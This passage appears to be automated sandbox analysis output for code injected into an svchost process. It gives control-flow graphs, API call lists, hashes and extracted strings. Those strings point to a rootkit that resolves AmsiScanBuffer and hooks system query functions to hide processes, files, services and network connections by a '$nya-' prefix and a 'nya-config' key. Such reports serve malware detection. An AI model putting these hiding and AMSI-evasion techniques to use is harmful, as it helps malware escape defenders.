14 API calls 8158->8159 8160 2a6613114b6 8159->8160 8178 2a66130ec58 8160->8178 8179 2a66130ec61 MultiByteToWideChar 8178->8179 8247 2a66130bec1 8246->8247 8251 2a66130be9a 8246->8251 8248 2a66130beea 8247->8248 8249 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8247->8249 8250 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8248->8250 8249->8247 8250->8251 8251->8044

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 1d8c54a57d6576012f959ce61210d1bdffab2f1e7e04f858be4e63cfd44f8a1b
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 4F517FA4F10A4AA7EE00EBA4EE4E7D4336CA746F45F880523940B23165DF7C865EC382

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: c1ac5e7ad3bf4f070cb0e86cadc43a41dd63b8a78b66ff7892f0b8646b5409cd
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 24D06721F21600D7EE096B51E89E3583269AB67F41FCC1425C50F232A0DF2C895DC342

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002A661303A35
                                                          • PathFindFileNameW.SHLWAPI ref: 000002A661303A44
                                                            • Part of subcall function 000002A661303F88: StrCmpNIW.KERNELBASE(?,?,?,000002A66130272F), ref: 000002A661303FA0
                                                            • Part of subcall function 000002A661303EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303EDB
                                                            • Part of subcall function 000002A661303EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F0E
                                                            • Part of subcall function 000002A661303EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F2E
                                                            • Part of subcall function 000002A661303EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F47
                                                            • Part of subcall function 000002A661303EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303A5B), ref: 000002A661303F68
                                                          • CreateThread.KERNELBASE ref: 000002A661303A8B
                                                            • Part of subcall function 000002A661301E74: GetCurrentThread.KERNEL32 ref: 000002A661301E7F
                                                            • Part of subcall function 000002A661301E74: CreateThread.KERNELBASE ref: 000002A661302043
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302049
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302055
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302061
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A66130206D
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302079
                                                            • Part of subcall function 000002A661301E74: TlsAlloc.KERNEL32 ref: 000002A661302085
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 9c889205013aa1f344880fe51b1c90f5b32aed787e9b3b341f17e014cbfa7cea
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: C9114C35F20A418BFB60E720A54DB9922E8A797F57F5841299407A31D0EF7DC49C8682

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 54 2a661303f88-2a661303f93 55 2a661303fad-2a661303fb4 54->55 56 2a661303f95-2a661303fa8 StrCmpNIW 54->56 56->55 57 2a661303faa 56->57 57->55
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $nya-
                                                          • API String ID: 0-1266920357
                                                          • Opcode ID: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                          • Instruction ID: 289fbf2455b5e5c93a4e915df526f1d2752526101905a9e540ef56bccb4f3004
                                                          • Opcode Fuzzy Hash: 3efaac12778606dcc95ddaec52b91f85937fb41b3d0fc3d1e7fd65e0d6b9b78d
                                                          • Instruction Fuzzy Hash: 3FD05E60B216058BEB54DFA18CDDAA073A8AB15F05F4C4035D90213500DF5C898EC711
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000003.2183186665.000002A6612D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_3_2a6612d0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: e242a0e5e891d3b9585325ebcd0ed74b4126737d0569d2fa288020d7ea7cd497
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 1D9100B2F0125187EB60CF25D408B69B3ADFB46F98F588120DE4947788DF38D886C701

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002A661301724: GetProcessHeap.KERNEL32 ref: 000002A66130172F
                                                            • Part of subcall function 000002A661301724: HeapAlloc.KERNEL32 ref: 000002A66130173E
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017AE
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017DB
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613017F5
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301815
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301830
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301850
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130186B
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A66130188B
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613018A6
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A6613018C6
                                                          • SleepEx.KERNELBASE ref: 000002A661301BDF
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A6613018E1
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301901
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130191C
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A66130193C
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301957
                                                            • Part of subcall function 000002A661301724: RegOpenKeyExW.ADVAPI32 ref: 000002A661301977
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A661301992
                                                            • Part of subcall function 000002A661301724: RegCloseKey.ADVAPI32 ref: 000002A66130199C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 7e09be3a26c553d09d1367f6d9cb0504d23b14bf07e7149b4d8dfcef5065d6bf
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 8D312175B0064193FF50EB26D64D36963FCAB46FC9F0C54219E0BA7396DF2CC8588296

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 322 2a661302ff0-2a661303069 324 2a66130306f-2a661303075 322->324 325 2a661303384-2a6613033a7 322->325 324->325 326 2a66130307b-2a66130307e 324->326 326->325 327 2a661303084-2a661303087 326->327 327->325 328 2a66130308d-2a66130309d GetModuleHandleA 327->328 329 2a66130309f-2a6613030af GetProcAddress 328->329 330 2a6613030b1 328->330 331 2a6613030b4-2a6613030d2 329->331 330->331 331->325 333 2a6613030d8-2a6613030f7 StrCmpNIW 331->333 333->325 334 2a6613030fd-2a661303101 333->334 334->325 335 2a661303107-2a661303111 334->335 335->325 336 2a661303117-2a66130311e 335->336 336->325 337 2a661303124-2a661303137 336->337 338 2a661303147 337->338 339 2a661303139-2a661303145 337->339 340 2a66130314a-2a66130314e 338->340 339->340 341 2a66130315e 340->341 342 2a661303150-2a66130315c 340->342 343 2a661303161-2a66130316b 341->343 342->343 344 2a661303251-2a661303255 343->344 345 2a661303171-2a661303174 343->345 346 2a661303376-2a66130337e 344->346 347 2a66130325b-2a66130325e 344->347 348 2a661303186-2a661303190 345->348 349 2a661303176-2a661303183 call 2a661301a30 345->349 346->325 346->337 352 2a66130326f-2a661303279 347->352 353 2a661303260-2a66130326c call 2a661301a30 347->353 350 2a661303192-2a66130319f 348->350 351 2a6613031c4-2a6613031ce 348->351 349->348 350->351 355 2a6613031a1-2a6613031ae 350->355 356 2a6613031fe-2a661303201 351->356 357 2a6613031d0-2a6613031dd 351->357 359 2a6613032a9-2a6613032ac 352->359 360 2a66130327b-2a661303288 352->360 353->352 364 2a6613031b1-2a6613031b7 355->364 367 2a66130320f-2a66130321c lstrlenW 356->367 368 2a661303203-2a66130320d call 2a661301cc4 356->368 357->356 365 2a6613031df-2a6613031ec 357->365 362 2a6613032b9-2a6613032c6 lstrlenW 359->362 363 2a6613032ae-2a6613032b7 call 2a661301cc4 359->363 360->359 369 2a66130328a-2a661303297 360->369 373 2a6613032c8-2a6613032d7 call 2a661301cfc 362->373 374 2a6613032d9-2a6613032e3 call 2a661303f88 362->374 363->362 387 2a6613032ee-2a6613032f9 363->387 371 2a661303247-2a66130324c 364->371 372 2a6613031bd-2a6613031c2 364->372 375 2a6613031ef-2a6613031f5 365->375 378 2a66130321e-2a66130322d call 2a661301cfc 367->378 379 2a66130322f-2a661303241 call 2a661303f88 367->379 368->367 368->371 377 2a66130329a-2a6613032a0 369->377 382 2a6613032e6-2a6613032e8 371->382 372->351 372->364 373->374 373->387 374->382 375->371 385 2a6613031f7-2a6613031fc 375->385 377->387 388 2a6613032a2-2a6613032a7 377->388 378->371 378->379 379->371 379->382 382->346 382->387 385->356 385->375 394 2a6613032fb-2a6613032ff 387->394 395 2a661303370-2a661303374 387->395 388->359 388->377 396 2a661303307-2a661303321 call 2a661313a40 394->396 397 2a661303301-2a661303305 394->397 395->346 398 2a661303324-2a661303327 396->398 397->396 397->398 401 2a661303329-2a661303347 call 2a661313a40 398->401 402 2a66130334a-2a66130334d 398->402 401->402 402->395 404 2a66130334f-2a66130336d call 2a661313a40 402->404 404->395
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: cf6f36a31f903a9fd4c55300e873ced9e69f280ad63d237708999190b6d26dd8
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: EAB17122B106908BEB58DF26D54CB99A3ECF746F85F485016EE0A63794DF39CD48C381

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID: _$6Z
                                                          • API String ID: 1239891234-452956228
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: d5c17cb4c7cf3c909d74c4f272eb40ba0ff49c0d8d52303684d6dee485b2997d
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 58419E32B14B8087E760CF24E84939E73A8F78AB55F580115EA8E57B98DF3CC559CB41
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 7c7bed2822bbbddefe14a2c4e8ae70cd1b929ef9ccd2928db9dd9b6c0cd6b6fb
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 17314172B05B8086EB608F60E8593DD73A8F786B49F48442ADA4E67B98DF7CC54CC711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: _$6Z
                                                          • API String ID: 1164774033-452956228
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: d800bea69320285669c55395fba52c8977cf73a79cf2f715dd0c395abd9f532e
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: E3A1D522B046804BFB20DB75A48C3AD6BE9E743F95F1C4115DA9A37A99DF3CC44AC742

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: 228cb54c9f24d9abbe7ae523bc510dcbd55cd971a479beb4ba48184290aa91fe
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: AB711736B10A5086EB10DF65E89D69933B8FB86F8DF485121DA4E63B68DF38C548C381

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 8174c13da692b48cf880c32ba8988f71a7fcdaa5d5fe7493dd048a9d9e62287d
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: 7C514A32B10B849BEB25CF62E44D35A77A5F78AF99F484124DE4A17768DF3CC0498741

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: d33c46db13dc7cd33e03f895f2b454a4c4ecdeca778de0e144b5f514b48c3e85
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 9B517A21B0174493EA199B56A80C3AA3298AB4BFB1F5C0725DE3F673D0DF3CD44D8696

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 201 2a66130a22c-2a66130a294 call 2a66130b144 204 2a66130a29a-2a66130a29d 201->204 205 2a66130a6f5-2a66130a6fb call 2a66130c388 201->205 204->205 206 2a66130a2a3-2a66130a2a9 204->206 208 2a66130a378-2a66130a38a 206->208 209 2a66130a2af-2a66130a2b3 206->209 211 2a66130a390-2a66130a394 208->211 212 2a66130a645-2a66130a649 208->212 209->208 213 2a66130a2b9-2a66130a2c4 209->213 211->212 214 2a66130a39a-2a66130a3a5 211->214 216 2a66130a64b-2a66130a652 212->216 217 2a66130a682-2a66130a68c call 2a661309324 212->217 213->208 215 2a66130a2ca-2a66130a2cf 213->215 214->212 220 2a66130a3ab-2a66130a3af 214->220 215->208 221 2a66130a2d5-2a66130a2df call 2a661309324 215->221 216->205 218 2a66130a658-2a66130a67d call 2a66130a6fc 216->218 217->205 227 2a66130a68e-2a66130a6ad call 2a661308070 217->227 218->217 224 2a66130a575-2a66130a581 220->224 225 2a66130a3b5-2a66130a3f0 call 2a661309704 220->225 221->227 235 2a66130a2e5-2a66130a310 call 2a661309324 * 2 call 2a661309a0c 221->235 224->217 228 2a66130a587-2a66130a58b 224->228 225->224 239 2a66130a3f6-2a66130a3ff 225->239 232 2a66130a59b-2a66130a5a3 228->232 233 2a66130a58d-2a66130a599 call 2a6613099cc 228->233 232->217 238 2a66130a5a9-2a66130a5b6 call 2a6613095a4 232->238 233->232 248 2a66130a5bc-2a66130a5c4 233->248 268 2a66130a330-2a66130a33a call 2a661309324 235->268 269 2a66130a312-2a66130a316 235->269 238->217 238->248 244 2a66130a403-2a66130a435 239->244 245 2a66130a568-2a66130a56f 244->245 246 2a66130a43b-2a66130a447 244->246 245->224 245->244 246->245 250 2a66130a44d-2a66130a46c 246->250 251 2a66130a6d8-2a66130a6f4 call 2a661309324 * 2 call 2a66130c2f4 248->251 252 2a66130a5ca-2a66130a5ce 248->252 254 2a66130a558-2a66130a55d 250->254 255 2a66130a472-2a66130a4af call 2a6613099e0 * 2 250->255 251->205 256 2a66130a5d0-2a66130a5df call 2a6613099cc 252->256 257 2a66130a5e1 252->257 254->245 281 2a66130a4e2-2a66130a4e5 255->281 264 2a66130a5e3-2a66130a5ed call 2a66130b1dc 256->264 257->264 264->217 279 